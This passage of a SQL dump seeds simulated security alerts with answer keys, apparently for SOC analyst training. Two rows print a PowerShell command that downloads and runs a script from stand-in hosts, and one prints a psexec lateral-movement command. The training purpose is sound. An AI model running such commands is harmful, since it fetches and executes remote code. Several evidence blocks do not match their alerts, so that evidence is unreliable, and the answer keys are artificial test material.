AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(603, 'Phishing Email Containing Malicious URL', 'high', 'Proofpoint', 'A phishing email containing a malicious URL was received. The URL is known for hosting malware.', 'Phishing', 'T1566', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:05:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.50\",\"username\":\"jsmith\",\"hostname\":\"mail-server-01\",\"email_sender\":\"spoofed@malicious.com\",\"url\":\"http://bad-url.com\"}', '2026-01-11 14:04:23', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"spoofed@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://bad-url.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts known malware\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a malicious URL in the email indicates a phishing attempt aimed at compromising user credentials.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Containing Malicious URL\",\"date\":\"2026-02-01T20:32:22.241Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(604, 'False Positive: Legitimate User Activity Mistaken for Malicious', 'low', 'Firewall', 'A legitimate user accessing an external service was flagged as suspicious due to an incorrect firewall rule.', 'Network Traffic', 'T1040', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"104.26.2.33\",\"username\":\"mgomez\",\"hostname\":\"laptop-34\",\"domain\":\"example.com\"}', '2026-01-11 14:04:23', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"104.26.2.33\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Reputable domain with no malicious history\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic\",\"analysis_notes\":\"The connection was flagged due to an overly restrictive firewall rule, not because of any real threat.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(605, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A PowerShell command was executed on the host which is commonly associated with malicious activity. The command attempts to download a file from an external IP address.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"command_line\":\"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45/malicious.ps1\')\\\"\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnop3456\",\"domain\":\"malicious-site.com\"}', '2026-01-11 14:05:25', '2026-02-22 14:52:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 123 times for hosting malicious scripts\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnop3456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in 5/5 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45/malicious.ps1\')\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command pattern associated with fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command and the external IP address are both indicators of a malicious activity. Immediate action is required.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(606, 'Failed Login Attempts from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected from an external IP address, indicating a possible brute force attack.', 'Brute Force', 'T1078', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T03:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.25\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"WEB-SERVER-01\",\"failed_attempts\":35}', '2026-01-11 14:05:25', '2026-03-05 05:19:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in brute force attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a foreign IP address indicates a likely brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.244Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T03:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(607, 'Phishing Email with Malicious URL Detected', 'high', 'Proofpoint', 'A phishing email was received containing a malicious URL, attempting to trick the user into visiting a fake login page.', 'Phishing', 'T1566', 1, 'Closed', 34, '{\"timestamp\":\"2026-01-11T08:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.0.0.15\",\"username\":\"asmith\",\"hostname\":\"MAIL01\",\"email_sender\":\"no-reply@fakesite.com\",\"url\":\"http://fakesite.com/login\"}', '2026-01-11 14:05:25', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fakesite.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for hosting phishing pages\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@fakesite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered, associated with phishing\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a malicious URL leading to a phishing page. The sender\'s domain is not legitimate.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL Detected\",\"date\":\"2026-02-01T20:32:22.245Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(608, 'Unusual Login Activity Detected from Known VPN Provider', 'low', 'Wazuh', 'A login attempt was detected from an IP address associated with a known VPN provider. The activity appears benign after further investigation.', 'Suspicious Login', 'T1078', 0, 'resolved', 189, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.0.2.10\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jsmith\",\"hostname\":\"LAPTOP-02\"}', '2026-01-11 14:05:25', '2026-02-22 15:15:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with benign VPN provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with a legitimate VPN provider, and the login activity matches a known user\'s behavior.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.246Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.0.2.10\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(609, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A suspicious PowerShell script was executed on an internal machine. This script is known to download additional malware.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com\')\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\"}', '2026-01-11 01:10:03', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, not exposed to the internet.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known malicious PowerShell command to download and execute scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is a known indicator of compromise for malware download and execution.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(610, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email containing a link to a known malicious domain was received by a user.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"192.168.1.20\",\"username\":\"asmith\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"phish@evil.com\",\"url\":\"http://phishing.example.com\",\"email_subject\":\"Urgent: Verify Your Account\"}', '2026-01-10 21:27:24', '2026-02-16 18:03:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"phish@evil.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://phishing.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing schemes.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a malicious site, confirmed by multiple OSINT sources.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Link Detected\",\"date\":\"2026-02-01T20:32:22.248Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(611, 'Internal Network Lateral Movement via PSExec', 'medium', 'Wazuh', 'A suspicious PSExec activity was detected moving laterally within the network from one internal host to another.', 'Lateral Movement', 'T1077', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\"}', '2026-01-11 02:27:11', '2026-03-10 00:01:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the initiating host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target host.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage can indicate lateral movement.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec used to execute commands remotely, indicating possible lateral movement.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.249Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.25 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
